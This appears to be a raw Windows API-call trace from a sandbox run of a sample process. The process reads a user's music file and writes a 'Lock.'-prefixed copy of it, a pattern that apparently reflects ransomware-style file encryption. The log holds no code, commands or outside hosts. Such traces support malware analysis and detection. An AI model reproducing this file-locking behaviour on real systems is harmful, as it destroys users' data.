PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.944] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\erIdlI.wav" (normalized: "c:\\users\\fd1hvy\\music\\eridli.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0205.944] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.944] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0205.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0205.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0205.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0205.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0205.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0205.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0205.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74d28 [0205.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.945] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0205.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74d28 | out: hHeap=0x2af0000) returned 1 [0205.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0205.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0205.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0205.946] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.erIdlI.wav" (normalized: "c:\\users\\fd1hvy\\music\\lock.eridli.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac [0205.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0205.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0205.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.986] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0205.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0205.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0205.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0205.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0205.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0205.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0205.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e2020 [0205.991] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0205.991] ReadFile (in: hFile=0x50c, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0xe7e3, lpOverlapped=0x0) returned 1 [0205.997] ReadFile (in: hFile=0x50c, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0205.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0205.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0205.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe7e3) returned 0x2aae878 [0205.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e2020 | out: hHeap=0x2af0000) returned 1 [0206.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0206.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0206.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0206.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0206.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0206.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe7e3) returned 0x2abd068 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0206.003] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe7e3) returned 0x2aae878 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0206.003] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0206.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0206.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0206.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0206.004] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0206.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0206.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe7e3) returned 0x2aae878 [0206.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0206.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0206.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0206.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0206.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8a0 [0206.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0206.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0206.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0206.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0206.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0206.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe7e3) returned 0x2acb858 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0206.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0206.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0206.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0206.006] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0206.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0206.007] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0206.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0206.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0206.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0206.007] 